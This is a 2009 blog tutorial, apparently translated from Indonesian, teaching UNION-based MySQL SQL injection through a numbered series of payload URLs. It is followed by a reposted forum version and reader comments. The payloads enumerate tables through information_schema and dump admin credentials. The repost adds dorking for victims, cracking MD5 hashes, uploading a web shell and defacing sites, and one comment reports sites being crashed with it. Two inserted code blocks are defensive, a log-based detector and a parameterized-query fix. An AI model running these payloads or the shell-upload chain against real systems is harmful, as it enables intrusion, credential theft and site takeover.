
My Step by Step SQL Injection

Posted by Admin on February 15, 2009 - 6:00 pm


Filed under WOW

Understanding SQL injection:

SQL injection is an attack performed from the client side by modifying an existing SQL statement in the client application's memory; it is also a technique for exploiting web applications that use a database to store their data.

What you need to know before MySQL SQL injection:

characters: ' or -
comments: /* or --

information_schema: for MySQL version 5.x; MySQL version 4.x does not support it

===========

= Step one: =

===========

Find the target.

e.g.: [site]/berita.php?id=100

Add the character ' at the end of the URL, or add the character "-", to see whether an error message appears.

example: [site]/berita.php?id=100' or

[site]/berita.php?id=-100

An error message then appears, such as the following (there are many other variants):


==========

= Step two: =

==========

Find and count the number of tables that exist in the database.

Use the command: order by

example: [site]/berita.php?id=-100 order by 1-- or

[site]/berita.php?id=-100 order by 1/*

Check each number step by step (one by one):

e.g.: [site]/berita.php?id=-100 order by 1--

[site]/berita.php?id=-100 order by 2--

[site]/berita.php?id=-100 order by 3--

[site]/berita.php?id=-100 order by 4--

until an error appears or the error message disappears.

e.g.: [site]/berita.php?id=-100 order by 9--

This means the number we take is 8:

[site]/berita.php?id=-100 order by 8--

===========

= Step three: =

===========
To find out which numbers appear on the page, use the union command.

Because the error appeared at number 9,

then: [site]/berita.php?id=-100 union select 1,2,3,4,5,6,7,8--

Suppose the number that comes out is 5.

Use the command version() or @@version to check the SQL version in use; the command goes in place of the number that came out.

e.g.: [site]/berita.php?id=-100 union select 1,2,3,4,version(),6,7,8-- or

[site]/berita.php?id=-100 union select 1,2,3,4,@@version,6,7,8--



Look at the version in use. If it is version 4, leave it, because on version 4 we have to guess the table and column names on the site ourselves, since the command from information_schema cannot be used.

If it is version 5, you are in luck: there is no need to guess the table and column names as on version 4, because the command from information_schema can be used.

============

= Step Four: =

============
To display the tables that exist on the site:

the command table_name >>> goes in place of the number that came out earlier

the command from information_schema.tables/* >>> goes after the last number

[site]/berita.php?id=-100 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables--

Suppose the table that appears is "admin".

===========

= Step Five: =

===========

To display all the tables:

the command group_concat(table_name) >>> goes in place of the number that came out earlier

the command from information_schema.tables where table_schema=database() >>> goes after the last number

[site]/berita.php?id=-100 union select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

=============

= Step Six: =

=============

the command group_concat(column_name) >>> goes in place of the number that came out earlier

the command from information_schema.columns where table_name=0xhexa-- >>> goes after the last number

[site]/berita.php?id=-100 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0xhexa--

At this stage you must convert the table name to hexadecimal.

A website that can be used for the conversion:

www.ascii-convert.co.cc

For example, the word to convert is admin, which becomes 61646D696E.

[site]/berita.php?id=-100 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x61646D696E--
============

= Step-Seven: =

============

To display the contents of the columns that were listed from the table:

the command concat_ws(0x3a, the columns whose contents you want to show) >>> goes in place of the number that came out earlier

the command from (the name of the table) >>> goes after the last number

[site]/berita.php?id=-100 union select 1,2,3,4,concat_ws(0x3a,the columns),6,7,8 from (table name)--

For example, the column names that came out are id, username, password:

[site]/berita.php?id=-100 union select 1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8 from admin--

==============

= Step-Eight: =

==============

The last stage is to look for the admin or login page.

The next is up to you because there is a web of power in your hands ...

For a clearer explanation, you can download the video tutorial file for this MySQL injection.

Run the file "Injection.html SQL" directly.

(N.B. Apologies for any wrong words or shortcomings in this video tutorial.)

Greeting

Gonzhack
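
An added example, not part of the original tutorial: a log-side detector for the request sequence walked through in steps one to seven (quote check, order by counting, union select, version check, information_schema enumeration, concat output). The log format, client addresses, rule names and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (client IP + request line); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 "GET /berita.php?id=100 HTTP/1.1"
203.0.113.9 "GET /berita.php?id=100' HTTP/1.1"
203.0.113.9 "GET /berita.php?id=-100+order+by+1-- HTTP/1.1"
203.0.113.9 "GET /berita.php?id=-100%20order%20by%209-- HTTP/1.1"
203.0.113.9 "GET /berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- HTTP/1.1"
203.0.113.9 "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables-- HTTP/1.1"
198.51.100.7 "GET /berita.php?id=101 HTTP/1.1"
"""

# One rule per stage of the tutorial; names and patterns are this example's own.
RULES = [
    ("quote_probe", re.compile(r"'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"\bversion\s*\(\s*\)|@@version", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("concat_dump", re.compile(r"\b(group_concat|concat_ws)\s*\(", re.I)),
    ("sql_comment", re.compile(r"--|/\*")),
]
LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"$')

def classify(query):
    """Names of the rules matched by a query string, after URL-decoding it."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(log_text):
    """Map each client IP to the set of probe stages seen in its requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ip, target = m.groups()
            hits[ip].update(classify(urlsplit(target).query))
    return dict(hits)

def suspects(log_text, min_stages=3):
    """Clients whose requests cover several distinct stages of the sequence."""
    return sorted(ip for ip, s in scan(log_text).items() if len(s) >= min_stages)

if __name__ == "__main__":
    print(suspects(SAMPLE_LOG), scan(SAMPLE_LOG))
```

Requiring several distinct stages per client keeps a single stray quote or `--` in a legitimate query string from raising an alert on its own.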


13 Comments

1.

LinKL says:

March 29, 2009 at 4:03 pm

On the website my goal ..

Ga there recordID = ....

of disposable

cat 21:22

cat 22:23
was how mas?

2.

Andyra says:

May 7, 2009 at 6:31 pm

om .. why I can not in step 3 yes

whereas step 1 ma 2 can but how can a three-_-y

om said in step 3 would be in the numbers ni?? Indeed figures out that important

Tw jangan2 ntu tu om hehehe toggle rate

om joke ...

Plis dong om .. kluenya again ..

3.

Patara says:

May 16, 2009 at 10:29 pm

Hi guys,

You managed to crash a few radio stations in the UK on Friday and have very kindly pointed out how you did it via this blog. Strangely enough, now I am not upset, because they are not mine!

However, what it shows me is that you are very good at breaking through what the UK techies think is a safe website. I therefore would like to employ you in a consultancy capacity to let me know how safe certain sites are as we develop them. By this I mean that you are to charge me a consultancy fee per site to let me know the weak points in any site that I send to you - however NOT to crash it :)

I understand if you are cautious about Standard and Poor's approach, but want to leave you with a thought: You guys are very smart - much smarter than my techies in the UK - who will be up and running again at some point, however I would like to put the knowledge you have to good use and I always pay someone who teaches me something. When I was younger I studied martial arts and was taught that if someone punches you in the face, it is because you have a weak guard, so you should respect that anyone can get through your guard and not make excuses for your own weakness (in letting the punches get through). Well, your punches got through and you have my respect :)

Hence I am willing to pay you to teach me how to stop others getting past our guard.

Regards

Patara

4.

Gardening says:

June 13, 2009 at 1:56 pm

Hello Guru, what enticed you to post an article? This article was extremely interesting, especially since I was searching for thoughts on this subject last Thursday.

5.

Denny Garden says:

June 13, 2009 at 4:37 pm

Such a useful blog? Wow!!

6.

Lidia says:

June 26, 2009 at 3:17 pm

Mas, had long since learned to hack really want to, not purposely to see this website. Googling my
own again hence the problem of mysql injection nyantron here. That's really great video, dial-up
connection lemot internetku really, is there a smaller version of the pdf? Then there's a tutorial on
writing that is lost or accidentally dilengkapin not ya? please can not ask for the full article? Thanks loh!

7. share] step by step SQL injection just for the learning course


[Share] step by step SQL injection just for the learning course
Post Admin on Thu January 16, 2010 5:14 pm


since here there is thread "hacking hacking trick-Share is ngetrend" in addition to strengthening my
memory, I am very forgetful soale Wink)? / S7;

I'll share my knowledge this is only a little about how to conduct SQL injection on the web ... (remember
only for learning just ea ... Very Happy)

ga ato useful if too vulgar in del aja .. (Dueh unnoticed if ane ordinary vulgar Very Happy)

Before talking about SQL injection, first I'll explain what SQL injection is and how it can happen. Actually SQL injection occurs when an attacker can insert some SQL statements into a 'query' by manipulating the data input into the application. Among database setups such as PHP + MySQL and ASP + MS Access or MySQL, here I'm only going to discuss SQL injection in the URL.

sob immediately wrote ...

1. looking at the first target with a dork mbah google "inurl: index.php? id =" (other dork can nyari on
google, many bgt koq)

2. suppose that already get the target http://www.korban.com/index.php?id=1

Add a single quote character "'" (without quotation marks) at the end of url

or add the character "-" to see if there is vuln.

so the url becomes http://www.korban.com/index.php?id=1 '

if there are errors on web pages means that Erb vuln if not search for other targets ...

3. locate and count the number of tables that exist in databasenya.gunakan command: + order + by +
numbers

so that it becomes http://www.korban.com/index.php?id=1+order+by+1-- url

now checks one by one until no longer find the error:

http://www.korban.com/index.php?id=1+order+by+1--
http://www.korban.com/index.php?id=1+order+by+2--

http://www.korban.com/index.php?id=1+order+by+3--

http://www.korban.com/index.php?id=1+order+by+4--

http://www.korban.com/index.php?id=1+order+by+4-- was not suppose to find the error again.

mean that we take is to figure 3

4. to figure out how much appear to use union command

because of this error until the number 3

then:

http://www.korban.com/index.php?id=1+union+select+1,2,3--

5. Suppose the number that comes out is 2. Use the command version() to check the SQL version in use; the command goes in place of the number that came out.

example:

http://www.korban.com/index.php?id=1+union+select+1,version(),3--

Look at the version in use. If it is version 4, leave it alone, because on version 4 we have to guess the table and column names on the site ourselves, since the command from+information_schema cannot be used. If it is version 5, you are in luck: there is no need to guess the table and column names as on version 4, because on version 5 the command from+information_schema can be used. Continue ...

6. To display all the tables: the command group_concat(table_name) -> goes in place of the number that came out earlier

the command +from+information_schema.tables+where+table_schema=database()-- -> goes after the last number

so the URL becomes http://www.korban.com/index.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

7. Suppose the table you found that probably contains the username + password is the table "admin"; first convert the admin table name to hexadecimal form (this can be done here: http://www.string-functions.com/string-hex.aspx)

8. Enter the command group_concat(column_name) -> goes in place of the number that came out earlier

enter the command +from+information_schema.columns+where+table_name=61646d696e-- -> goes after the last number; 61646d696e is the word admin in hex form

so the URL becomes http://www.korban.com/index.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x61646d696e--

9. To display the contents of the columns that were listed from the table:

the command group_concat(0x3a, the columns whose contents you want to show) -> goes in place of the number that came out earlier

the command +from+(the name of the table) -> goes after the last number

example: the column names that came out are adminID, Name, password

so it becomes

http://www.korban.com/index.php?id=1+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3+from+admin--

10. 've met tuh username password na ma ... na tuh stay dencrypt pass. if the form could be on crack
md5 here http://www.md5decrypter.co.uk/

11. search login page Admin -> Login as admin -> Search fitur2 uploaded files or images -> then upload
your shell -> then whatever you want diapain tu web Very Happy. can be hell if directly PM tu web
admin who'll soon have the patch (na e-mail can also search the table yesteryear), Jagan in eah coz
deface web make it hard to sob ...

12. cape dee huft writing that much ..., del aja ga if useful ....
thx for the predecessors who have given science a cuma2 make ane ... Very Happy

Admin
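
An added example, not code from the post: the root cause the post describes (request input inserted into the query) next to the fix, using Python's sqlite3 as an offline stand-in for PHP + MySQL. The schema, rows, function names and input string are constructed; the admin column names follow step 9.

```python
import re
import sqlite3

# Constructed input: a plain UNION using the column names from step 9 of the post.
PAYLOAD = "0 union select adminID, Name, password from admin"

def make_db():
    """In-memory stand-in for the site's database (constructed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE berita (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (adminID INTEGER, Name TEXT, password TEXT);
        INSERT INTO berita VALUES (1, 'Hello', 'First article');
        INSERT INTO admin VALUES (1, 'root', 'constructed-hash');
    """)
    return db

def get_article_vulnerable(db, raw_id):
    # BEFORE: the id from the URL is pasted into the SQL text, so whatever
    # follows the number is parsed as part of the statement.
    sql = "SELECT id, title, body FROM berita WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_article_safe(db, raw_id):
    # AFTER: accept only a short run of ASCII digits, then bind the value.
    # A bound parameter is sent as data and cannot alter the statement.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM berita WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def leaks_db_error(fetch, db, raw_id):
    """True if the input makes a database error surface (the quote check in step 2)."""
    try:
        fetch(db, raw_id)
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    for fetch in (get_article_vulnerable, get_article_safe):
        print(fetch.__name__, fetch(db, PAYLOAD), leaks_db_error(fetch, db, "1'"))
```

With the bound parameter, neither the quote check nor the UNION changes the result: the safe function returns no rows and raises no database error.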


Re: [share] step by step SQL injection just for the learning course

Post engkoh on Fri January 31, 2010 4:52 pm

nice info gan ..

engkoh
